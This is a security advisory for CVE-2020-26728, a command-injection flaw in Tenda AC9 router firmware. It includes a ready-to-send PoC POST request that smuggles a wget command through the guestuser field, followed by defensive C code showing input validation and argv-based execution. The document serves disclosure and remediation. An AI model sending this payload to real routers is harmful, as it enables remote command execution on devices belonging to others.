CVE-2020-26728: routers/rce1.md at a80b30bccfc9b76f3a4868ff28ad5ce2e0fca180 · Lyc-heng/routers

A vulnerability was discovered in Tenda AC9 v3.0 V15.03.06.42_multi and Tenda AC9 V1.0 V15.03.05.19(6318)_CN which allows for remote code execution via shell metacharacters in the guestuser field to the __fastcall function with a POST request.


vendor: Tenda

product: AC9, AC15, AC18

version: V15.03.06.42_multi (AC9), V15.03.05.19(6318)_CN (AC9) and earlier

type: Arbitrary Command Execution

author: Li Yuan Cheng

institution: School of Computer and Cyberspace @ Communication University of China

Vulnerability description

I found an Arbitrary Command Execution vulnerability in the router's web server, httpd. While processing the guestuser parameter of a POST request, its value is passed directly to doSystem, which results in RCE. The details are shown below:

[image]

PoC

POST /goform/SetSambaCfg HTTP/1.1
Host: 192.168.0.1
Proxy-Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: password=hwrmji
Content-Length: 154

password=111111&premitEn=0&internetPort=21&action=delelte&usbName=1&guestpwd=guest&guestuser=;wget http://192.168.0.198:8888;&guestaccess=r&fileCode=UTF-8

When action is not del, the first request stores ;wget http://192.168.0.198:8888; as the guestuser value; on the second request the router reads the stored guestuser back and executes wget http://192.168.0.198:8888. 192.168.0.198 is the IP of our own machine, so we listen on port 8888 with nc and capture the HTTP request coming from 192.168.0.1, as shown in the figure below.

We tested the vulnerability on a real device. The picture may be a bit fuzzy, but I also recorded a video in which you can watch the exact triggering process of the vulnerability.

[image]

Watch the operation video
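The root cause above (a request field formatted straight into a doSystem-style shell command) shown beside a hardened form, as an added example that is not the advisory's or Tenda's code. guestuser_is_valid, unsafe_build, safe_argv and the "smbtool adduser" command are hypothetical names; the only page-specific value used is the PoC's guestuser payload.

```c
/* Added example, not Tenda's code: allowlist validation for a guestuser-style
 * field, with the vulnerable shell-string shape beside a hardened argv shape. */
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define GUESTUSER_MAX 32

/* Accept 1..GUESTUSER_MAX bytes of [A-Za-z0-9_.-] starting with a letter
 * or digit. ';', '|', '`', '$', spaces and newlines are all rejected
 * before the value goes anywhere near a command. */
bool guestuser_is_valid(const char *s)
{
    if (s == NULL)
        return false;
    size_t n = strlen(s);
    if (n == 0 || n > GUESTUSER_MAX || !isalnum((unsigned char)s[0]))
        return false;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && c != '_' && c != '.' && c != '-')
            return false;
    }
    return true;
}

/* Vulnerable shape: the field is formatted into one string that a
 * doSystem()-style helper hands to /bin/sh, so ';' ends the intended
 * command and the rest of the field runs on its own. "smbtool adduser"
 * is a placeholder for whatever the firmware really runs. */
int unsafe_build(char *out, size_t outlen, const char *guestuser)
{
    int n = snprintf(out, outlen, "smbtool adduser %s", guestuser);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Hardened shape: validate, then pass the value as one argv element for an
 * execv()-style call. No shell parses it. Returns argc, or -1 if rejected. */
int safe_argv(const char *argv[], size_t max, const char *guestuser)
{
    if (max < 4 || !guestuser_is_valid(guestuser))
        return -1;
    argv[0] = "smbtool";
    argv[1] = "adduser";
    argv[2] = guestuser;
    argv[3] = NULL;
    return 3;
}
```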
